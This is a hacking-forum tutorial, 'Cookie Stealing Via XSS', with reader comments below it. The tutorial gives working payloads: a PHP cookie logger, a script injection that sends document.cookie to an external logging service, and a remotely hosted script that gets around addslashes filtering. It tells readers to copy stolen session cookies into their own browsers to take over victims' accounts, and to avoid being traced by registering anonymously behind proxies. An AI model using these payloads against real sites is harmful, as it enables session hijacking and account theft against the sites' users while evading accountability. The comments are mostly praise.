Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Cookie Stealing Via XSS


Cookie Stealing Via XSS

By Uber0n avatarUber0n | 34650 Reads |
0     0

In this tutorial I’ll try to explain the procedure of cookie stealing through XSS in a few simple steps. This way you can apply it to any site you want, but I’ll stick to http://www.example.com/ for this walkthrough.

Step one: Finding a XSS vulnerability

I assume everyone who wants to learn cookie stealing through XSS already knows how to find XSS vulnerabilities, so I won’t explain this in detail here.

For this walkthrough we’ll stick with a simple GET variable XSS, just to make it easier. If you understand this and have some basic knowledge about the POST method, you’ll be able to make autosubmitting pages for POST XSS vulnerabilities yourself.

Here’s our PoC XSS vulnerability: markuphttp://www.example.com/search.php?query="><script>alert(123)</script>

When this page is loaded, a popup message saying “123” should be displayed. This means we have our vulnerability.

Step two: Setting up a cookie stealer

If we want to steal cookies, we’ll need for example a PHP page which stores them for us. A simple cookie stealer can look like this:

$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookie . "\n\n");
fclose($file);
?>```

However there are other ways to log the cookie as well. In my opinion, the best and most secure way is to use WhiteAcid's Community Cookie Logger (CCL) which can be found at http://ccl.whiteacid.org/

If you use your own server or host account for cookie stealing, it's easy for others to track you down. Therefore we'll use CCL in this walkthrough. Registering at CCL gives you an anonymous account with a random ID number instead of a username. For this tutorial I just use a fake account with the ID 123456.

So now, we just check the CCL service by executing a test string. We go to
http://ccl.whiteacid.org/log.php?123456test_for_XSS.
We MUST include our ID number in the test URL, otherwise it won't show up in our logs. Then we login to CCL and see the new entry with our IP, referer, user agent and of course the data "test_for_XSS". The cookie logger works fine.

**Step three: Logging a cookie**

So we have a XSS vulnerability and we have a cookie logger. Now we just have to connect them to each other.

We make a new injection (instead of that alert thing) which sends the cookie data. It could look like this:

```markuphttp://www.example.com/search.php?query="><script>location.href = 'http://ccl.whiteacid.org/log.php?123456'+document.cookie;</script>```

If the site doesn't use addslashes() or any other filters that mess up our injection, we have successfully captured the cookie and saved it in our CCL account! From here, we can copy the users' cookies (most commonly the sessions) to our own cookies and get into their accounts...

**Step four: Filter evasion**

Let's say we encountered the following common problem: the target page uses addslashes() on the GET variable before printing it, which kills our injection by destroying our quotes. No problem, we just have to do it another way then ;)

We register a new account on a free hosting site (I'll use the FreeWebs.com account Uber0n for this walkthrough) and make a new script file there. I make a file called cookiesteal.js and give it the following content:
```markuplocation.href = 'http://ccl.whiteacid.org/log.php?123456'+document.cookie;```

Now we call the script through the XSS vulnerable page:
```markuphttp://www.example.com/search.php?query="><script src=http://www.freewebs.com/uber0n/cookiesteal.js>```

Login to CCL once again and you'll see the new entry! However, remember NOT to register the account on the hosting site with your normal nickname and make sure you register using a good proxy so that you can't be tracked. You can also ask XSSed.com to host your script files.

If you encounter other filters than addslashes, try running the scripts through iframes, images etc. Some good filter evasion techniques can be found at

http://www.xssing.com/index.php?x=1
http://ha.ckers.org/xss.html

Feel free to contact me if you have any questions.
// Uber0n

Comments
ghost's avatar
ghost 16 years ago

skit bra artikel :P great article :happy:

Uber0n's avatar
Uber0n 16 years ago

@Shazrah: Thanks man :happy:

ghost's avatar
ghost 16 years ago

wow nice article and very well written :D

Futility's avatar
Futility 16 years ago

What is this? An article that actually teaches you something and wasn't copy/pasted? How did this get accepted? Great work Uber0n, thanks a lot.

ghost's avatar
ghost 16 years ago

Excell-on-tat Awesome!(RATED)

ghost's avatar
ghost 16 years ago

Very very nice article ;)

Uber0n's avatar
Uber0n 16 years ago

Thanks for your nice comments everyone :D

SySTeM's avatar
SySTeM 16 years ago

You should use $_GET['cookie'] instead of $HTTP_GET_VARS["cookie"]; ;) But nice article :) Hehe :)

ghost's avatar
ghost 16 years ago

Needs moore understanding of Javascript principles. Remove the link to the XSS Cheatsheet (newbies :() and add more ways to XSS/exploit Javascript.

ghost's avatar
ghost 16 years ago

just two word. Awesome and awesome.

ghost's avatar
ghost 16 years ago

Uber0n the teacher…hehehe… nice1 :happy:

Uber0n's avatar
Uber0n 16 years ago

@system_meltdown: I'll change that next time I update the article. @spyware/Mephisto: The links are here to stay, but I could always add a few more examples of filter breaking and stuff ^^

korg's avatar
korg 16 years ago

I think this article totally sucked balls should have never been posted…. HaHa just kinding UberOn, Nice article Excellent job, Should help a lot of people. We need alot more like this. 15/10.

ghost's avatar
ghost 16 years ago

@korg: It's spelt Uber0n with a zero istead of a Cap o…just to let you know not being mean or anything.

ghost's avatar
ghost 16 years ago

w000t a great article XD

korg's avatar
korg 16 years ago

@SaMTHG Hit the wrong key Uber0n has been here almost as long as me. I know who he is. Oh, Don't EVER correct me again!:D

korg's avatar
korg 16 years ago

PS: I gotta stop drinking and posting.;)

Uber0n's avatar
Uber0n 16 years ago

@korg: Nah, keep on posting ^^ it doesn't matter if you're sober or not :D

ghost's avatar
ghost 16 years ago

@korg: you post like you're always drunk

Uber0n's avatar
Uber0n 16 years ago

@fallingmidget: Maybe he is, maybe he isn't ;)